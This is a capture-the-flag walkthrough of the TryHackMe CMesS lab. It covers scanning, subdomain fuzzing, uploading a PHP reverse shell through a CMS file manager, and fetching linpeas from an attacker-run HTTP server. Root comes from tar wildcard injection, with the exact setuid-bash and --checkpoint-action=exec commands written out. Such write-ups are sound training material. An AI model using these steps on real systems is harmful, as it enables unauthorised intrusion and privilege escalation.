TryHackMe - CMesS

• Room

Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.125.143
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-28 12:09 EDT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.20% done
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.26% done
Nmap scan report for cmess.thm (10.10.125.143)
Host is up (0.27s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (95%), Linux 3.16 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (92%), Linux 3.0 - 3.2 (92%), Linux 3.0 - 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1289.07 seconds

Port 80

image

• When googling we find this (needs to be authenticated)

• We have a robots.txt
• With gobuster we found: /login and /admin

• Let's look for subdomain wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://cmess.thm' -H "HOST: FUZZ.cmess.thm" --hw 290

• We remove pages with 290 words because it is a not found response so not relevant for us even though the response code is 200. W find dev subdomain let's add it to /etc/hosts 10.10.125.143 dev.cmess.thm

• We find a few usernames and a username password combination! Let's try it!
• And it works!
• In the dashboard there is a feature called file manager. If we check out the config file we find a few interesting info including another password that we keep aside for later.
• We can try the CVE previously found with google

• let's follow this blog post

  • => NOT WORKING

• What's working though is to use the feature to download a php reverse shell this way we get a shell. Our file goes in the asset folder
• Then we just need to access to the url http://cmess.thm/assets/php-reverse-shell.php and we get our shell
• We stabilize our shell python3 -c 'import pty; pty.spawn("/bin/bash")'

• Lets get a privesc enum script in our target. I am a fan of linpeas so I am gonna use it here.

  • wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

  • python3 -m http.server 80

  • And from our target we type wget http://10.13.22.56/linpeas.sh (we need to be in the tmp folder to successfully write the file)

  • We make it executable chmod +x linpeas.sh and we launch it ./linpeas.sh

Lateral movement

Interesting output from linpeas

• Kernel exploits
• Sudo version
• List of cve we could try out

[+] [CVE-2017-16995] eBPF_verifier
[+] [CVE-2016-5195] dirtycow
[+] [CVE-2016-5195] dirtycow 2
[+] [CVE-2021-3156] sudo Baron Samedit 2
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2017-7308] af_packet
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
[+] [CVE-2017-6074] dccp
[+] [CVE-2017-1000112] NETIF_F_UFO
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
[+] [CVE-2016-8655] chocobo_root
[+] [CVE-2016-4557] double-fdput()
[+] [CVE-2021-3156] sudo Baron Samedit
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
[+] [CVE-2019-18634] sudo pwfeedback
   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
[+] [CVE-2019-15666] XFRM_UAF
[+] [CVE-2018-1000001] RationalLove
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
[+] [CVE-2017-1000253] PIE_stack_corruption
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
[+] [CVE-2016-2384] usb-midi
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
[+] [CVE-2016-0728] keyring
      CVE-2016-8655
      CVE-2018-14665
      CVE-2017-16695

• other interesting things to check

/etc/cron.d:
-rw-r--r--  1 root root  191 Feb  6  2020 popularity-contest
*/2 *   * * *   root    cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -  
-rw------- 1 root root 317 Feb  6  2020 /etc/mysql/debian.cnf
drwxr-xr-x 2 root root 4096 Feb  6  2020 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Feb  6  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
/usr/share/doc/openssh-client/examples/sshd_config 
/opt/.password.bak

• The sudo version is not successful cause our version does not seem vulnerable.

• Let's check this file /opt/.password.bak
• We have another password

• Let's try it if we su andre it works! let's ssh as andre
• Let's grab the user flag
• Let's now enumerate way to privesc from Andre's user

Privesc

Linepeas as Andre

• Our home is in the path. Ressources for this on hacktricks This seems to be an interesting cron job
• This is doing a backup with a wildcard. We can try to abuse this.

• Let's go to the backup folder

• echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/andre/backup/runme.sh we create a malicious bash

• touch /home/andre/backup/--checkpoint=1 when the scheduled script is going to read the home directory it will have a file named as a tar command, so it will interpret it. This command displays a status message every 1

• touch /home/andre/backup/--checkpoint-action=exec=sh\ runme.sh then this command is going to make and action when the checkpoint we created before is hit

• Let's now try to launch our script /tmp/bash -p

• It works!
• Let's grab the last flag